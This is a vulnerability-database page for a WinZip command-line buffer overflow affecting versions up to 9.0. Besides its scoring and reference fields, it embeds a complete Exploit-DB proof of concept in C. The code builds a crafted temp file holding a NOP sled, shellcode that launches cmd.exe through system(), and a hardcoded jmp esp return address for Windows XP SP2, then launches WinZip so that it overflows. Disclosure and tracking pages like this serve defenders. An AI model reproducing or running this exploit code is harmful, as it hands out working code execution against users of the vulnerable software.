Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Multiple buffer overflows in WinZip 9.0 and earlier may allow attackers to execute arbitrary code via multiple vectors, including the command line.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 3.7 | AV:L/AC:H/Au:N/C:P/I:P/A:P | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 1034
Publication date : 2005-06-06 22h00 +00:00
Author : ATmaCA
EDB Verified : Yes
/*
*
* WinZip Command Line Local Buffer Overflow
* http://securitytracker.com/alerts/2004/Sep/1011132.html
* http://www.winzip.com/wz90sr1.htm
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: [email protected]
* Credit to kozan
*
*/
/*
*
* Tested with WinZip 8.1 on Win XP Sp2 En
* Bug Fixed on WinZip 9.0 Service Release 1 (SR-1)
* http://www.winzip.com/wz90sr1.htm
*
*/
#include <windows.h>
#include <stdio.h>
#define NOP 0x90
void main()
{
// create crafted command line
char tmpfile[] = "c:\\wzs45.tmp";
char winzippath[] = "C:\\Program Files\\WINZIP\\winzip32.exe";
char zipandmailpar[] = " -* /zipandmail /@ ";
char runpar[300];
int i = 0;
strcpy(runpar,winzippath);
strcat(runpar,zipandmailpar);
strcat(runpar,tmpfile);
// need for some input file name .tmp but not must to exist
char inputfile[] = "C:\\someinputfile.ext\n";
// launch a local cmd.exe
char shellcode[] =
"\x55\x8B\xEC\x33\xFF"
"\x57\x83\xEC\x04\xC6\x45\xF8"
"\x63\xC6\x45\xF9\x6D\xC6\x45"
"\xFA\x64\xC6\x45\xFB\x2E\xC6"
"\x45\xFC\x65\xC6\x45\xFD\x78"
"\xC6\x45\xFE\x65\xB8"
"\xC7\x93\xC2\x77" //77C293C7 system() - WinXP SP2 - msvcrt.dll
"\x50\x8D\x45\xF8\x50"
"\xFF\x55\xF4";
// create crafted .tmp file
FILE *di;
if( (di=fopen(tmpfile,"wb")) == NULL ){
return;
}
for(i=0;i<sizeof(inputfile)-1;i++)
fputc(inputfile[i],di);
fprintf(di,"c:\\");
for(i=0;i<384;i++)
fputc(NOP,di);
for(i=0;i<sizeof(shellcode)-1;i++)
fputc(shellcode[i],di);
fprintf(di,"\xBF\xAC\xDA\x77"); //EIP - WinXp Sp2 Eng - jmp esp addr
fprintf(di,"\x90\x90\x90\x90"); //NOPs
fprintf(di,"\x90\x83\xEC\x74"); //sub esp,0x74
fprintf(di,"\xFF\xE4\x90\x90"); //jmp esp
fprintf(di,"\n");
fclose(di);
WinExec(runpar,SW_SHOW);
}
// milw0rm.com [2005-06-07]
Products Mentioned
Configuraton 0
Winzip>>Winzip >> Version 7.0
- Winzip>>Winzip >> Version 7.0 (Open CPE detail)
Winzip>>Winzip >> Version 8.0
- Winzip>>Winzip >> Version 8.0 (Open CPE detail)
Winzip>>Winzip >> Version 8.1
- Winzip>>Winzip >> Version 8.1 (Open CPE detail)
- Winzip>>Winzip >> Version 8.1 (Open CPE detail)
Winzip>>Winzip >> Version 8.1
- Winzip>>Winzip >> Version 8.1 (Open CPE detail)
Winzip>>Winzip >> Version 9.0
- Winzip>>Winzip >> Version 9.0 (Open CPE detail)
- Winzip>>Winzip >> Version 9.0 (Open CPE detail)
References
http://www.ciac.org/ciac/bulletins/o-211.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
Tags : third-party-advisory, government-resource, x_refsource_CIAC
2025©
tesweb SA
